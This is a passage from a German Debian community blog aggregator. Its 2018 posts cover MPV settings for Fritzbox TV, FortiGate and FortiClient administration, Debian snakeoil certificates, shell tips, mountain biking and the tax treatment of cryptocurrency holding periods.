Alternativ könnt ihr die Einstellungen auch direkt in Gnome MPV eintragen. Öffnet dazu die Einstellungen und tragt im Reiter Allgemein ganz unten im Feld Weitere Optionen für MPV die Zeile --rtsp-transport=udp --deinterlace ein. So startet Gnome MPV automatisch immer mit den richtigen Eintellungen — allerdings auch dann, wenn ihr mit dem Programm „normale“ Videos abspielen wollt. Nutzt mal Gnome MPV nur als TV-Anwendung geht das klar, andernfalls würde ich den Weg über einen eigenen Eintrag im Anwendungsmenü gehen.

Für den Empfang des Fritzbox-TVs mit MPV muss man UDP als Transportmodus für die RTSP-Streams aktivieren.Für den Empfang des Fritzbox-TVs mit MPV muss man UDP als Transportmodus für die RTSP-Streams aktivieren.

von Christoph Langner am 29.05.2018 16:32

25.05.2018

Stefan Fahl (stefan)

Mountainbike Impressionen vom Niederrhein. Hometrail Krefeld [GoPro]

Was Mountainbiken ausmacht, kann man schwer beschreiben, man muss es am Besten leben und selber aktiv betreiben. Bei uns am Niederrhein, wo es eher flach als bergig ist, kann man trotzdem wunderschön in der Natur mit seinem Mountainbike die Zeit genießen. Man ist in wenigen Minuten weg von der hektischen Großstadt und hat in den zahlreichen Wäldern die Trails in unmittelbarer Nähe. Wir haben zwar nicht die Berge wie das Sauerland oder die Alpen vor der Haustür, dafür haben wir ein abwechslungsreiches Gebiet von Wäldern vor unserer Haustür. Bei so einem schönen Wetter wie in den letzten Tagen macht es besonders viel Freude, mit seinem Mountainbike die Landschaft zu durchqueren.

#mtblife #mtblove #mountainbiking #dh #downhill #mtbdaily #mtbpictureoftheday #mtbenduro #mtbpage #mtbiking #enduromountainbike #gopro #rideraddict #gtbikes #downhillmtb #specialized #biking #freeride #redbullrampage #revistaridebike #vlog #youtuber #mtbbrasil #bikelifestyle #bikelife #xterra #alicante #archilovers #architecture #buildings

Titel Emergent
Künstler William Ryan Fritch
Album Settled Scores: Music for Film Vol. I
Lizenziert von The Orchard Music (im Auftrag von Lost Tribe Sound) und 1 musikalische Verwertungsgesellschaften

The post Mountainbike Impressionen vom Niederrhein. Hometrail Krefeld [GoPro] appeared first on Webseite von Stefan Fahl.

von Stefan Fahl am 25.05.2018 13:21

24.05.2018

Dominik Kupschke (bommi)

Fortigate Disk Logging – Maximales Alter der Logs

Eine FortiGate mit integrierter Logdisk speichert im Default die Logs nur für 7 Tage, ältere Logs werden entfernt.
Das maximale Alter der Logs lässt sich jedoch frei konfigurieren, in diesem Beispiel auf einen Zeitraum von 30 Tagen:

config log disk setting
set status enable
set maximum-log-age 30
end

Alle Logs die den konfigurierten Zeitraum überschreiten werden nun automatisch entfernt.
Sollte sich der Füllstand der Logdisk ihrer maximalen Kapazität nähern wird das Betriebssystem schon vor dem gesetzten Wert eine Löschung der ältesten Logs durchführen.

von Dominik am 24.05.2018 19:47

23.05.2018

Dominik Kupschke (bommi)

FortiClient INSTALLLEVEL

Der Fortinet FortiClient besteht aus unterschiedlichsten Modulen, aus diesen kann bei einer Installation ausgewählt werden.

Soll der FortiClient per msiexec installiert werden muss entsprechend die Variable INSTALLLEVEL gesetzt sein, sofern man keine Installation aller vorhandenen Features durchführen möchte.

Aus folgenden Install Leveln kann ausgewählt werden:

Feature Name Install Level
Feature_Core 1
Feature_Basic 1
Feature_AntiVirus 5
Feature_WebFilter 5
Feature_VPN 3
Feature_SSLVPN 1
Feature_WanAcceleration 5
Feature_EndPointNAC 3
Feature_Firewall 5
Feature_Vulnerability 5
Feature_SingleSignOnMobility 3

Diese Liste stammt von einem FortiClient in Version 5.4.3.

Installieren kann man den FortiClient dann bspw. per msiexec auf diesem Weg:
msiexec /i forticlient.msi /quiet INSTALLLEVEL=1
Der Default INSTALLLEVEL ist 100, dadurch werden alle Features installiert.

von Dominik am 23.05.2018 09:02

07.03.2018

Axel Hellinger (cryptolegal)

Cryptocurrencies und 10-Jahre-Haltefrist – § 23 I Nr. 2 S. 4 EstG

Bitcoins und andere Cryptocurrencies erfreuen sich nicht nur wegen ihrer guten Rendite weiterhin großer Beliebtheit. Die steuerfreie Vereinnahmung der Gewinne ein weiterer Performanceshub. Daher wäre eine Haltefrist von 10 Jahren für viele ein wirtschaftlicher Supergau.
Da Cryptocurrencies mittlerweile vielfach als Geld betrachtet und behandelt werden, dienen diese wiederum als Einkunftsquelle.

1. Cryptocurrencies als Einkunftsquelle

So werden Coins z.B. darlehensweise hingegeben oder für Masternodes oder Staking verwendet. Ohne auf die konkrete Aufgabe von Masternodes oder Staking einzugehen, die Hinterlegung des Coinbetrages ist in dem Netzwerk implementiert, um Vandalismus zu verhindern. Um das Netzwerk zu kompromittieren müssten entsprechend hohe Summen eingesetzt werden.

Da diese Coins eine Einkunftsquelle darstellen, wurde nunmehr schon mehrfach diskutiert, ob sich damit die Haltefrist nicht von einem auf zehn Jahre erhöht – § 23 I Nr. 2 S. 4 EStG.

Dies hätte verheerende Auswirkungen, da die Wertsteigerung des Coin idR. die erzielten Einkünfte um ein Vielfaches übersteigt. Ein Engagement durch deutsche Coinhalter in der jeweiligen Infrastruktur würde zu einem massiven Verlustgeschäft. Der Standort Deutschland würde sich aus der technischen Infrastruktur weitgehend zurückziehen.

Glücklicherweise ist dem nicht so. Die Verwendung eines Coins als Einkunftsquelle führt nie zu einer Verlängerung der Haltefrist auf 10 Jahre.

Es soll jedoch nicht übersehen werden, dass ein Coin durchaus auch notwendigen Betriebsvermögen sein kann und dann nie in eine Steuerfreiheit gerät. Dann handelt es sich aber nicht mehr um eine Einkunftsquelle iSd. §§ 22 Nr. 3 iVm. 23 I Nr. 2 EStG.

2. BFH und Fremdwährungsdarlehen

Zwar lässt der Wortlaut des § 23 EStG diesen Schluss durchaus zu, aber die 10 Jahresfrist wird vom BFH – Urteil v. 2.5.2000, BStBl. 2000 II, S. 614 – restriktiv ausgelegt. Die Finanzverwaltung steht dem nicht entgegen – LfSt Bayern, Verfügung v. 10.3.2016, S 2256.1.1 – 6/6 St 32.

Der Entscheidung des BFH lag ein Fremdwährungsdarlehen zugrunde. Dieses Fremdwährungsdarlehen teilte der BFH gedanklich in die Fremdwährung und das darin gebundene Kapital auf. Beides behandelte er getrennt.

Daraus folgte, dass die Zinseinkünfte Einkünfte des Kapitals waren und nicht Einkünfte der Fremdwährung.

Damit kann es somit auch nicht zu einer Verlängerung der Haltefrist aufgrund einer Einkunftsverwendung kommen.

3. Übertragbarkeit auf Cryptocurrencies

Coins sind keine Währung. Eine Währung ist ein gesetzliches Zahlungsmittel – § 14 Absatz 1 Satz 2 Bundesbankgesetz.

Stellenweise findet von staatlicher Seite eine Annäherung statt. So wird von virtuellen Währungen gesprochen. Allerdings ist es verfrüht, hier schon einen Willen zur Gleichsetzung zu sehen. Wahrscheinlicher ist eher eine Übernahme des allgemeinen Sprachgebrauchs.

Dennoch ist diese restriktive Auslegung der Einkunftsverwendung bei Crptocurrencies zutreffend.

3.1 Steuersparmodell Schiffscontainer

Der Verlängerung der Haltefrist lag ein Steuersparmodell zugrunde. In der Vergangenheit war ein Invest in Schiffscontainer für Privatpersonen vor allem steuerlich attraktiv. Es wurden daher institutionell Steuersparmodelle aufgelegt, um an den Steuerersparnissen der Privatpersonen zu partizipieren.

Um die Unterschiede zu den Coins zu kennen, ist die Funktionsweise des Containermodells wichtig.

Eine Privatperson kaufte von dem Initiator des Sparmodells einen oder mehrere Container. Gleichzeitig wurde ein langfristiger Mietvertrag mit diesem abgeschlossen und es bestand mehr oder weniger sicher eine Rückkaufspflicht am Ende der Vertragszeit.

Für die Privatperson lag faktisch nur ein einziges Invest in ein Unternehmen vor. Steuerlich handelte es sich jedoch um einen Mietvertrag und einen An- bzw- Verkauf einen Wirtschaftsgutes.

Das hatte zur Folge, dass die Privatperson bei der Vermietung sonstige Einkünfte erzielte – § 22 Nr. 3 EStG.

Hierbei durften pauschal 10% der Anschaffungskosten des Containers (die sogenannte „Absetzung für Abnutzung“ kurz Afa) steuermindernd abgezogen werden.

Je höher der persönliche Steuersatz ist, desto lukrativer war die Steuerersparnis.

Der pauschale Abzug ist im Steuerrecht nichts ungewöhnliches. Es gibt hierfür sogar amtliche Afa-Tabellen. Jedoch ist die Abweichung der typisierten Afa von dem tatsächlichen Substanzverzehr idR. nur temporär. Denn normalerweise befindet sich ein Wirtschaftsgut im Betriebsvermögen. Ist hier die typisierte Afa höher als der tatsächliche Substanzverzehr, entsteht ein steuerpflichtiger Buchgewinn.

Befindet sich das Wirtschaftsgut jedoch im Privatvermögen, entsteht zwar auch ein Buchgewinn. Dieser war jedoch nach 1 Jahr steuerfrei.

Nach ca. 7 Jahren Vermietung hatten die Container durchaus noch einen Restwert von 60% bei einem  Buchwert von 30%. Demnach konnte man 30% des Gesamtinvest steuerfrei vereinnahmen.

Dem sollte mit dem § 23 I Nr. 2 S. 4 EStG ein Riegel vorgeschoben werden. Der Buchgewinn war auch nach 7 Jahren noch steuerpflichtig, bzw. wenn der Steuerpflichtige den Container über die zehn Jahre hielt, war der Wiederverkaufswert entsprechend niedrig.

3.2 Vergleich Container und Fremdwährungsdarlehen

Bei den schon entschiedenen Fremdwährungsdarlehen ist der Sachverhalt jedoch ein anderer. Bei der Einkünfteerzielung entsteht kein Substanzverzehr. Eine Afa wird nicht steuermindernd angesetzt. Es wird daher auch kein Gewinn systemwidrig in die private und somit steuerfreie Vermögensebene verlagert.

Daher hat der BFH als auch die Finanzverwaltung diese Aufspaltung in die Wirtschaftsgüter Fremdwährung und das darin gebundene Kapital vorgenommen.

3.3 Keine Haltefrist von 10 Jahren

Diese Aufspaltung ist auch für Cryptocurrencies zu übernehmen. Denn auch hier wird bei der Einkünfteerzielung iSd. § 22 Nr. 3 EStG keine Afa steuermindernd gegen gerechnet.

Eine Anwendbarkeit des § 23 I Nr. 2 S. 4 EStG scheidet aus.

Demzufolge verlängert sich die Haltefrist bei Coins, welche Einkünfte aus Zinsen o.ä. hatten, nicht auf 10 Jahre.

Hinweis: Die obige Betrachtung gilt nur für Einkünfte aus § 22 EStG. Sollten die Einkünfte der Coins z.B. gewerblicher Art sein – § 15 EStG – sind die Coins meist notwendiges Betriebsvermögen.  Kursgewinn sind damit unabhängig von einer Haltefrist immer steuerpflichtig.

Es ist darüber hinaus auch denkbar, einen Coin mit Wertverzehr zu konstruieren. Mangels praktischer Relevanz wurde dies hier jedoch außen vor gelassen.

 

HELLINGER.legal - Steuern | Recht | Cryptos

von support am 07.03.2018 08:33

24.02.2018

Christian Schmitt (slater)

Wollten wir nicht immer wie die Turtles sein?

Sehr geil!

Das muss ich mir glaube direkt holen!!!

lol

von Slater am 24.02.2018 20:59

04.02.2018

Falk Husemann (josen)

Debian Snakeoil Zertifikat erstellen

Um unter Debian das per Default unter Ubuntu bereitstehende snakeoil Zertifikat zu erstellen sind folgende Befehle nötig.

sudo apt-get install ssl-cert
sudo make-ssl-cert generate-default-snakeoil
ls -l /etc/ssl/certs/ssl-cert-snakeoil.pem /etc/ssl/private/ssl-cert-snakeoil.key

von fh am 04.02.2018 09:05

21.01.2018

Stefan Fahl (stefan)

Mountainbike Süchteln 2018

Windig war es 🌬💨💨. Heute morgen ging es nach Süchteln, hier haben wir den bekannten Trails einen Besuch abgestattet. Den gesamten Rückweg hatten wir Gegenwind. Wir dachten schon, wir sind an der Nordsee. .

 

 

The post Mountainbike Süchteln 2018 appeared first on Webseite von Stefan Fahl.

von Stefan Fahl am 21.01.2018 19:18

10.01.2018

(Meillo)

2018-01-11

2018-01-11



This is a way to concatenate mpeg2 (svcd) files:

     cat part1.mpg part2.mpg | avconv -i - -codec copy -async 25
     out.mpg

I'm not sure if it is a correct or good one. It just worked  well
enough for me.



Owl102 showed this nice way to do boolean  logic  in  the  shell:
[0] Instead of setting flag variables to strings like `1' or  `0'
and  compare them, you can set them to ``true'' and ``false'' and
let those programs run to return the value, like this:

     if $SERVERSTATUS && $VPNSTATUS


[0]  https://debianforum.de/forum/viewtopic.php?f=32&t=168197&p=1160229#p1160174


http://marmaro.de/lue/        markus schnalke <meillo@marmaro.de>

10.01.2018 23:00

Willkommen!
Forum
Chat
Wiki/Tipps
Planet
Bildergalerie
Links
Twitter
dieses und jenes
Blogger
(BigOlly) (feed)
(Lord_Carlos und mweinelt) (feed)
(Meillo) (feed)
(Trurl) (feed)
(c3f2o) (feed)
(emge) (feed)
(thoys) (feed)
(trompetenkaefer) (feed)
Andre Nitschke (gnude) (feed)
Axel Hellinger (cryptolegal) (feed)
Beni Goll (Bennerl) (feed)
Bernd Dau (whisper) (feed)
Bert Radke (bert) (feed)
Bjoern Schiessle (BeS) (feed)
Christian Imhorst (immi) (feed)
Christian Schmitt (slater) (feed)
Christoph Langner (Chrissss) (feed)
Christoph Wickert (raoul) (feed)
Daniel Gestl (mcdaniels) (feed)
Dominik George (Natureshadow) (feed)
Dominik Kupschke (bommi) (feed)
Dominik Pieper (nachtwandler) (feed)
Dominik Schulz (tex) (feed)
Falk Husemann (josen) (feed)
Felix Schmeing (gimbar) (feed)
Florian Ragwitz (godsmacker) (feed)
Florian Wagner (futejia) (feed)
Gerrit Kruse (MrGerardCruiz) (feed)
Helmut Roewer (Dunkelangst) (feed)
Hendrik Richter (Hendi) (feed)
Holger Reinmann (codeaeffchen) (feed)
Jan Hauke Rahm (jhr-online) (feed)
Jochen Skulj (feed)
Jochen Welzel (jeff84) (feed)
Jörg Kruse (4A4B) (feed)
Jürgen Braun (jaybe) (feed)
Lars Moelleken (voku1987) (feed)
Malte Kiefer (beLI3VeR) (feed)
Malte Schmidt (maltris) (feed)
Manuel Kaderli (suntsu) (feed)
Marc Nowak (TCA) (feed)
Marco Laspe (rockiger) (feed)
Marco Scholtyssek (marco_s) (feed)
Marco Scholtyssek (marco_s) (feed)
Marcus (DeltaLima) (feed)
Marius M. M. (devilx) (feed)
Markus Matuszczak (konsumer) (feed)
Markus W. Kropp (Musix) (feed)
Martin Dosch (Dogge) (feed)
Nico Hartung (xyznico) (feed)
Oliver Groschopp (beetlefrosch) (feed)
Patrick Schmid (compr00t) (feed)
René Hering (ReneH) (feed)
Roman Hanhart (Thurgau) (feed)
Sabine Becker (AtariFrosch) (feed)
Sebastian Feltel (feltel) (feed)
Sebastian Moors (mauser) (feed)
Stefan Fahl (stefan) (feed)
Stefan J. Betz (encbladexp) (feed)
Steffen Moeller (smoe) (feed)
Steffen Rumberger (inne) (feed)
Stephan Tetzel (zefanja) (feed)
Sven S. (FearFactor) (feed)
Thorsten Sperber (TRex) (feed)
Tobias Dols (TobsenD) (feed)
Tom Karasek (Natas12) (feed)
Torsten Werner (bollin) (feed)
Viktor Bindewald (Vitei) (feed)
Vinzenz Vietzke (vinz) (feed)
posativ (feed)
thoys (feed)
Feeds
ATOM Feed
RSS 1.0 Feed
RSS 2.0 Feed
FOAF
OPML
Letztes Update
20.06.2019 17:46 (GMT+1)
Planetarium
Planet Debian
Planet Debian Administration
Planet Skolelinux
Planet Ubuntu
Planet RootForum
Planet symlink
Planet GNOME
Planet KDE
Planet Apache
Planet freedesktop.org
mehr ...
top
Zum Seitenanfang
Diese Webseite ist keine offizielle Webseite des Debian Projekts.
Haftungsausschluss und ImpressumDatenschutzrichtliniedebianforum.de Verhaltensregeln

Powered by Planet Venus
Template entwickelt von Timo Salmen, basierend auf dem Debian Live Template, entwickelt von Christoph Haas.